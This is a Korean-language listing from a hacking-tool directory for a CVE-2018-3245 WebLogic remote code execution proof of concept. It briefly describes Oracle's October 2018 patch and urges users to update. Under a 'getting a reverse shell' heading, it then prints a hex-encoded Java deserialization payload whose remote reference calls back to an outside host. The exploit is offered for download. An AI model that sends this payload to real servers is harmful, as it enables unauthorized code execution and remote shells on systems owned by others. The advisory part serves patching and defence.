Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2018-3245 — CVE-2018-3245 | Kitploit
도구/GitHubGitHub/jas502n/cve-2018-3245
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubjas502n/cve-2018-3245

CVE-2018-3245

CVE-2018-3245

저장소 보기
14107년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Weblogic-CVE-2018-3245

CVE-2018-3245

0x00 소개

현지 시간 10월 16일, 베이징 시간 10월 17일 새벽, Oracle 공식은 10월(3분기) 중요 패치 업데이트 CPU(Critical Patch Update)를 발표했습니다.

이번 업데이트는 7월(2분기) CPU 패치에서 완전히 수정되지 않은 (CVE-2018-2893) Weblogic 원격 코드 실행 취약점을 수정했으며, 새로 수정된 취약점 번호는 CVE-2018-3245입니다.

해결 방법

Oracle 공식은 이번 중요 패치 업데이트(CPU)에서 해당 취약점을 수정했습니다. 영향을 받는 사용자는 빠른 시일 내에 업데이트를 진행하여 보호할 것을 강력히 권장합니다.

참고: Oracle 공식 패치를 받으려면 사용자가 정품 소프트웨어 라이선스 계정을 보유해야 하며, 해당 계정으로 https://support.oracle.com에 로그인한 후 최신 패치를 다운로드할 수 있습니다.

Oracle 공식 CPU 링크:

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html

0x01 리버스 셸 얻기

root@kitploit:~
jas502n-poc.txt 

Payload(hex): aced00057372002f636f6d2e73756e2e6a6e64692e726d692e72656769737472792e5265666572656e6365577261707065725f5374756200000000000000020200007872001a6a6176612e726d692e7365727665722e52656d6f746553747562e9fedcc98be1651a0200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e0300007870773b000a556e696361737452656600127777772e63616e796f757365656d652e636300001a0c0000000009e0b68e00000000000000000000000000000078

도구 다운로드